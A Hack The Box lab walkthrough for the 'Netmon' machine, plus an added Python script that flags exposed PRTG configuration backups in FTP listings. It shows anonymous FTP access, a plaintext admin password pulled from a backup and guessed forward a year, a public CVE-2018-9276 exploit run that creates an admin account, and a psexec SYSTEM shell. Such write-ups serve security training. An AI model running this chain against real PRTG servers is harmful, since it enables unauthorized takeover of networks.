Hack The Box – Netmon – Walkthrough

FTP is exposed to the network

nmap -A -n -F -T5 netmon.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 15:31 UTC
Nmap scan report for netmon.htb (10.10.10.152)
Host is up (0.045s latency).
Not shown: 95 filtered ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-title: PRTG Starting...
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: printer|switch
Running (JUST GUESSING): HP embedded (85%), Dell embedded (85%)
OS CPE: cpe:/h:hp:designjet_650c cpe:/h:dell:powerconnect_5424
Aggressive OS guesses: HP DesignJet 650C printer (85%), Dell PowerConnect 5424 switch (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5m31s, deviation: 0s, median: 5m30s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-08-15T15:37:45
|_  start_date: 2020-08-15T15:36:49

Connect over FTP and retrieve user.txt

# ftp netmon.htb
Connected to netmon.htb.
220 Microsoft FTP Service
Name (netmon.htb:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

ftp> passive
Passive mode on.

ftp> ls
227 Entering Passive Mode (10,10,10,152,207,23).
150 Opening ASCII mode data connection.
02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM       <DIR>          inetpub
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-03-19  08:08AM       <DIR>          Users
02-25-19  11:49PM       <DIR>          Windows
226 Transfer complete.

ftp> cd Users\Public
250 CWD command successful.

ftp> dir
227 Entering Passive Mode (10,10,10,152,207,27).
125 Data connection already open; Transfer starting.
02-03-19  08:05AM       <DIR>          Documents
07-16-16  09:18AM       <DIR>          Downloads
07-16-16  09:18AM       <DIR>          Music
07-16-16  09:18AM       <DIR>          Pictures
02-03-19  12:35AM                   33 user.txt
07-16-16  09:18AM       <DIR>          Videos
226 Transfer complete.

ftp> mget user.txt
mget user.txt? y
227 Entering Passive Mode (10,10,10,152,207,29).
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.20 secs (0.1649 kB/s)

Try accessing port 80

Something called PRTG Network Monitor (NETMON) is running.

Accessing its data directory over FTP lets us retrieve a backup of the config file.

ftp> cd "Users\All Users\Paessler\PRTG Network Monitor\"
250 CWD command successful.

ftp> ls
227 Entering Passive Mode (10,10,10,152,207,212).
125 Data connection already open; Transfer starting.
08-15-20  12:18PM       <DIR>          Configuration Auto-Backups
08-15-20  11:37AM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
08-15-20  11:37AM       <DIR>          Logs (Web Server)
08-15-20  11:42AM       <DIR>          Monitoring Database
02-25-19  10:54PM              1189697 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
08-15-20  01:42PM              1713485 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.

ftp> mget "PRTG Configuration.old.bak"
mget PRTG Configuration.old.bak? y
227 Entering Passive Mode (10,10,10,152,207,228).
125 Data connection already open; Transfer starting.
226 Transfer complete.
1153755 bytes received in 3.23 secs (348.8171 kB/s)
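Because the whole system drive is browsable over anonymous FTP, the first thing a defender should check is whether configuration backups like the ones listed above are reachable without credentials. The following Python script is an added example, not part of the original walkthrough: it parses Microsoft ftpd directory-listing output and flags PRTG configuration files and backup-style names. The SENSITIVE patterns are my own assumption for this audit, and the sample listing is copied from the FTP session above.

```python
import re
from typing import Dict, List, Optional

# One line of a Microsoft ftpd "LIST"/"dir" response looks like:
#   02-25-19  10:54PM              1189697 PRTG Configuration.dat
#   08-15-20  12:18PM       <DIR>          Configuration Auto-Backups
LIST_LINE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}[AP]M)\s+"
    r"(?:(?P<dir><DIR>)|(?P<size>\d+))\s+(?P<name>.+?)\s*$"
)

# Names an anonymous FTP user should never be able to read.
# These patterns are an assumption for this audit, based on the listing above.
SENSITIVE = (
    re.compile(r"^PRTG Configuration\.", re.I),  # live PRTG config and its backups
    re.compile(r"\.(bak|old)$", re.I),          # any other backup-style file
)

# Sample input: copied from the FTP session in this walkthrough, including the
# FTP status lines the parser has to skip.
SAMPLE_LISTING = """\
227 Entering Passive Mode (10,10,10,152,207,212).
125 Data connection already open; Transfer starting.
08-15-20  12:18PM       <DIR>          Configuration Auto-Backups
08-15-20  11:37AM       <DIR>          Log Database
02-25-19  10:54PM              1189697 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
08-15-20  01:42PM              1713485 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
226 Transfer complete.
"""

def parse_listing(text: str) -> List[Dict[str, Optional[object]]]:
    """Turn Microsoft ftpd listing text into entries; non-listing lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LIST_LINE.match(line.strip())
        if not m:  # e.g. "226 Transfer complete."
            continue
        entries.append({
            "name": m["name"],
            "is_dir": m["dir"] is not None,
            "size": int(m["size"]) if m["size"] else None,
        })
    return entries

def flag_sensitive(entries: List[Dict[str, Optional[object]]]) -> List[str]:
    """Return the names of regular files that match a SENSITIVE pattern."""
    return [str(e["name"]) for e in entries
            if not e["is_dir"] and any(p.search(str(e["name"])) for p in SENSITIVE)]

if __name__ == "__main__":
    for name in flag_sensitive(parse_listing(SAMPLE_LISTING)):
        print("exposed:", name)
```

Feed it the output of an authenticated or anonymous `dir` to confirm that a PRTG data directory is not reachable from an FTP root.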

Log in with the credentials from the backup file

Inspecting the backup file retrieved earlier yields PrTg@dmin2018.

# cat PRTG\ Configuration.old.bak | grep -A 1 prtgadmin
              <!-- User: prtgadmin -->
              PrTg@dmin2018

That password does not log in, so from the date we guess that the password is PrTg@dmin2019 and log in with it.

I looked around but found no clue to the administrator account.

Look for vulnerabilities in PRTG Network Monitor (NETMON)

# searchsploit prtg
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                         |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution                                                                                   | windows/webapps/46527.sh
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)                                                                               | windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting                                                                                                | java/webapps/34108.txt
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

# searchsploit -m windows/webapps/46527.sh
  Exploit: PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46527
     Path: /usr/share/exploitdb/exploits/windows/webapps/46527.sh
File Type: Bourne-Again shell script, ASCII text executable, with very long lines, with CRLF line terminators

Copied to: /home/shimizu/netmon/46527.sh

# ./46527.sh -u http://10.10.10.152 -c "_ga=GA1.2.1241551964.1597505933; _gid=GA1.2.1239716465.1597505933; OCTOPUS1813713946=e0RERDI4MEQ2LUFCNTYtNEVENi1CRjJBLUU5RjcxNUI4MzE1Nn0%3D; _gat=1"
bash: ./46527.sh: /bin/bash^M: bad interpreter: No such file or directory

# sed -i 's/\r//' 46527.sh

# ./46527.sh -u http://10.10.10.152 -c "_ga=GA1.2.1241551964.1597505933; _gid=GA1.2.1239716465.1597505933; OCTOPUS1813713946=e0RERDI4MEQ2LUFCNTYtNEVENi1CRjJBLUU5RjcxNUI4MzE1Nn0%3D; _gat=1"

[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution                [*]
[+]#########################################################################[+]
[*] Date: 11/03/2019                                                        [*]
[+]#########################################################################[+]
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*]
[+]#########################################################################[+]
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*]
[*] Version: 18.2.38                                                        [*]
[*] CVE: CVE-2018-9276                                                      [*]
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*]
[+]#########################################################################[+]

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'

[+]#########################################################################[+]

 [*] file created
 [*] sending notification wait....

 [*] adding a new user 'pentest' with password 'P3nT3st'
 [*] sending notification wait....

 [*] adding a user pentest to the administrators group
 [*] sending notification wait....


 [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!

The cookie was taken from the browser session logged in earlier.

Retrieve root.txt as the pentest user

# cd /usr/share/doc/python3-impacket/examples
# python3 psexec.py pentest:'P3nT3st!'@10.10.10.152
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file CTXMidGW.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service Gvmj on 10.10.10.152.....
[*] Starting service Gvmj.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
3018977fb944bf1878f75b879fba67cc